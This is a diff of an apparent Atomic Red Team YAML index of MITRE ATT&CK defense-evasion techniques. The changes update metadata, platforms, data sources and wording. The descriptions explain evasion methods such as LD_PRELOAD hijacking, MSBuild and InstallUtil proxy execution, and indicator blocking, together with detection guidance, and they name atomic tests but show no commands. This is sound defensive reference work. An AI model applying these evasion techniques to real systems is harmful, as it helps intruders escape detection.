- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T17:33:44.855Z'
+ modified: '2020-06-26T16:09:59.324Z'
created: '2020-03-12T20:38:12.465Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Environment variable
+ - Loaded DLLs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - DLL monitoring
x_mitre_detection: |-
Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.
@@ -24591,40 +25346,48 @@ defense-evasion:
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
- x_mitre_data_sources:
- - Environment variable
- - Loaded DLLs
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - DLL monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1562:
technique:
+ id: attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529
+ description: |-
+ Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
+
+ Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
+ name: Impair Defenses
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1562
url: https://attack.mitre.org/techniques/T1562
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Impair Defenses
- description: |-
- Adversaries may maliciously modify a victim system in order hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
-
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
- id: attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T22:18:11.350Z'
+ modified: '2020-07-09T14:43:42.718Z'
created: '2020-02-21T20:22:13.470Z'
x_mitre_platforms:
- Linux
- Windows
- macOS
+ - AWS
+ - GCP
+ - Azure
x_mitre_data_sources:
+ - GCP audit logs
+ - Azure activity logs
+ - AWS CloudTrail logs
- Anti-virus
- Services
- API monitoring
@@ -24655,29 +25418,7 @@ defense-evasion:
atomic_tests: []
T1562.006:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1562.006
- url: https://attack.mitre.org/techniques/T1562/006
- - external_id: CAPEC-571
- source_name: capec
- url: https://capec.mitre.org/data/definitions/571.html
- - url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A
- description: Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved
- September 6, 2018.
- source_name: Microsoft Lamin Sept 2017
- - source_name: Microsoft About Event Tracing 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events
- description: Microsoft. (2018, May 30). About Event Tracing. Retrieved June
- 7, 2019.
- - source_name: Medium Event Tracing Tampering 2018
- url: https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
- description: 'Palantir. (2018, December 24). Tampering with Windows Event
- Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.'
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indicator Blocking
+ id: attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da
description: "An adversary may attempt to block indicators or events typically
captured by sensors from being gathered and analyzed. This could include maliciously
redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based
@@ -24697,15 +25438,39 @@ defense-evasion:
forwarding telemetry and/or creating a host-based firewall rule to block traffic
to specific hosts responsible for aggregating events, such as security information
and event management (SIEM) products. "
- id: attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da
+ name: Indicator Blocking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1562.006
+ url: https://attack.mitre.org/techniques/T1562/006
+ - external_id: CAPEC-571
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/571.html
+ - url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A
+ description: Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved
+ September 6, 2018.
+ source_name: Microsoft Lamin Sept 2017
+ - source_name: Microsoft About Event Tracing 2018
+ url: https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events
+ description: Microsoft. (2018, May 30). About Event Tracing. Retrieved June
+ 7, 2019.
+ - source_name: Medium Event Tracing Tampering 2018
+ url: https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
+ description: 'Palantir. (2018, December 24). Tampering with Windows Event
+ Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.'
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-19T19:20:39.087Z'
+ modified: '2020-07-09T14:43:42.450Z'
created: '2020-03-19T19:09:30.329Z'
x_mitre_platforms:
- Windows
+ - macOS
+ - Linux
x_mitre_contributors:
- Rob Smith
x_mitre_data_sources:
@@ -24744,13 +25509,15 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:03:09.766Z'
created: '2020-03-19T21:27:32.820Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_defense_bypassed:
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
- Anti-virus
- - Host intrusion prevention systems
- - Log analysis
- - Signature-based detection
+ - Binary file metadata
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
or other security tool alert. Similar events may also occur at the boundary
through network IDS, email scanning appliance, etc. The initial detection
@@ -24760,17 +25527,15 @@ defense-evasion:
operation, assuming that individual events like an anti-virus detect will
not be investigated or that an analyst will not be able to conclusively link
that event to other activity occurring on the network.
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_defense_bypassed:
- Anti-virus
- - Binary file metadata
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ - Host intrusion prevention systems
+ - Log analysis
+ - Signature-based detection
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
- T1551:
+ T1070:
technique:
id: attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -24781,8 +25546,8 @@ defense-evasion:
These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.
external_references:
- source_name: mitre-attack
- external_id: T1551
- url: https://attack.mitre.org/techniques/T1551
+ external_id: T1070
+ url: https://attack.mitre.org/techniques/T1070
- external_id: CAPEC-93
source_name: capec
url: https://capec.mitre.org/data/definitions/93.html
@@ -24794,28 +25559,28 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:43:29.196Z'
created: '2017-05-31T21:30:55.892Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_detection: File system monitoring may be used to detect improper deletion
+ or modification of indicator files. Events not stored on the file system
+ may require different detection mechanisms.
+ x_mitre_defense_bypassed:
+ - Log analysis
+ - Host intrusion prevention systems
+ - Anti-virus
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- API monitoring
- Windows event logs
- x_mitre_defense_bypassed:
- - Log analysis
- - Host intrusion prevention systems
- - Anti-virus
- x_mitre_detection: File system monitoring may be used to detect improper deletion
- or modification of indicator files. Events not stored on the file system
- may require different detection mechanisms.
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- identifier: T1551
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_version: '1.1'
+ identifier: T1070
atomic_tests:
- name: Indicator Removal using FSUtil
auto_generated_guid: b4115c7a-0e92-47f0-a61e-17e7218b2435
@@ -24835,13 +25600,8 @@ defense-evasion:
elevation_required: true
T1202:
technique:
- id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1202
@@ -24858,13 +25618,18 @@ defense-evasion:
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
source_name: RSA Forfiles Aug 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ name: Indirect Command Execution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-02-05T14:28:08.379Z'
+ modified: '2020-06-20T22:09:22.559Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_version: '1.1'
x_mitre_contributors:
@@ -24876,9 +25641,8 @@ defense-evasion:
- Windows event logs
x_mitre_defense_bypassed:
- Static File Analysis
- - Application whitelisting
- - Process whitelisting
- - Whitelisting by file name or path
+ - Application control
+ - Application control by file name or path
x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
such as Sysmon, for events such as process creations that include or are resulting
from parameters associated with invoking programs/commands/files and/or spawning
@@ -24989,13 +25753,18 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-19T20:31:11.389Z'
created: '2020-02-21T21:05:32.844Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Matt Graeber, @mattifestation, SpecterOps
+ - Red Canary
+ - Travis Smith, Tripwire
+ - Itzik Kotler, SafeBreach
+ x_mitre_data_sources:
+ - SSL/TLS inspection
+ - Digital certificate logs
x_mitre_detection: |-
A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)
@@ -25009,18 +25778,13 @@ defense-evasion:
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072
- x_mitre_data_sources:
- - SSL/TLS inspection
- - Digital certificate logs
- x_mitre_contributors:
- - Matt Graeber, @mattifestation, SpecterOps
- - Red Canary
- - Travis Smith, Tripwire
- - Itzik Kotler, SafeBreach
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1553.004
atomic_tests:
- name: Install root CA on CentOS/RHEL
@@ -25147,7 +25911,7 @@ defense-evasion:
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe.
- InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
+ InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
name: InstallUtil
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -25167,29 +25931,29 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T15:45:33.971Z'
+ modified: '2020-06-20T22:34:46.529Z'
created: '2020-01-23T19:09:48.811Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Process whitelisting
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Casey Smith
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior
history of known good arguments and executed binaries to determine anomalous
and potentially adversarial activity. Command arguments used before and after
the InstallUtil.exe invocation may also be useful in determining the origin
and purpose of the binary being executed.
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Casey Smith
- x_mitre_platforms:
- - Windows
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.004
atomic_tests:
- name: CheckIfInstallable method call
@@ -25742,19 +26506,19 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-02-10T19:52:47.724Z'
created: '2020-02-10T19:49:46.752Z'
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Binary file metadata
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment, look
for invalid signatures as well as unusual certificate characteristics and
outliers.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Binary file metadata
+ x_mitre_platforms:
+ - macOS
+ - Windows
atomic_tests: []
T1149:
technique:
@@ -25785,35 +26549,37 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-30T13:53:57.518Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - Binary file metadata
- - Malware reverse engineering
- - Process monitoring
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - macOS
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Application whitelisting
+ - Process whitelisting
+ - Whitelisting by file name or path
x_mitre_detection: Determining the original entry point for a binary is difficult,
but checksum and signature verification is very possible. Modifying the LC_MAIN
entry point or adding in an additional LC_MAIN entry point invalidates the
signature for the file and can be detected. Collect running process information
and compare against known applications to look for suspicious behavior.
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Process whitelisting
- - Whitelisting by file name or path
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_platforms:
- - macOS
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_data_sources:
+ - Binary file metadata
+ - Malware reverse engineering
+ - Process monitoring
+ x_mitre_version: '2.0'
atomic_tests: []
T1574.006:
technique:
id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may set the LD_PRELOAD environment variable to point at malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. This environment variable is used to control when different shared libraries are loaded by a program.(Citation: TLDP Shared Libraries) Libraries specified by this variable with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+ Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
- LD_PRELOAD hijacking is a method of executing arbitrary code, abusing how environment variables are used to load alternate shared libraries during process execution. LD_PRELOAD hijacking may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
+ Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+
+ LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
name: LD_PRELOAD
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -25822,6 +26588,10 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - source_name: Man LD.SO
+ url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
+ description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
+ June 15, 2020.
- source_name: TLDP Shared Libraries
url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved
@@ -25847,20 +26617,20 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T18:46:55.796Z'
+ modified: '2020-06-15T21:59:25.358Z'
created: '2020-03-13T20:09:59.569Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Monitor for changes to environment variables, as well as the commands to implement these changes.
-
- Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_platforms:
+ - Linux
x_mitre_data_sources:
- Process monitoring
- File monitoring
- Environment variable
- x_mitre_platforms:
- - Linux
+ x_mitre_detection: |-
+ Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.
+
+ Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -25955,22 +26725,22 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T23:12:40.041Z'
created: '2020-02-04T19:24:27.774Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - root
x_mitre_detection: |-
Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.
- x_mitre_permissions_required:
- - User
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
+ - Linux
identifier: T1222.002
atomic_tests:
- name: chmod - Change file or folder mode (numeric mode)
@@ -26212,21 +26982,21 @@ defense-evasion:
phase_name: initial-access
modified: '2020-03-23T21:48:41.083Z'
created: '2020-03-13T20:26:46.695Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Perform regular audits of local system accounts to detect
accounts that may have been created by an adversary for persistence. Look
for suspicious account behavior, such as accounts logged in at odd times or
outside of business hours.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1127.001:
technique:
@@ -26247,28 +27017,28 @@ defense-evasion:
description: |-
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
- Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
+ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
id: attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96
type: attack-pattern
kill_chain_phases:
- phase_name: defense-evasion
kill_chain_name: mitre-attack
- modified: '2020-03-29T19:56:43.201Z'
+ modified: '2020-06-08T23:29:28.074Z'
created: '2020-03-27T21:50:26.042Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - " .NET Framework version 4 or higher"
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of MSBuild.exe. Compare recent invocations of those binaries with prior history
of known good arguments and executed binaries to determine anomalous and potentially
adversarial activity. Command arguments used before and after invocation of
the utilities may also be useful in determining the origin and purpose of
the binary being executed.
- x_mitre_system_requirements:
- - " .NET Framework version 4 or higher"
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ x_mitre_platforms:
+ - Windows
identifier: T1127.001
atomic_tests:
- name: MSBuild Bypass Using Inline Tasks
@@ -26324,30 +27094,30 @@ defense-evasion:
phase_name: privilege-escalation
modified: '2020-02-18T18:03:37.481Z'
created: '2020-02-18T18:03:37.481Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Access tokens
- - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
x_mitre_detection: |-
If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Access tokens
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1036.004:
technique:
@@ -26385,14 +27155,12 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T20:21:11.895Z'
created: '2020-02-10T20:30:07.426Z'
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_data_sources:
- - Windows Registry
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: Look for changes to tasks and services that do not correlate
with known software, patch cycles, etc. Suspicious program execution through
scheduled tasks or services may show up as outlier processes that have not
@@ -26402,17 +27170,24 @@ defense-evasion:
of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement.
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
+ - Linux
atomic_tests: []
T1036:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Masquerading
+ description: |-
+ Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
+
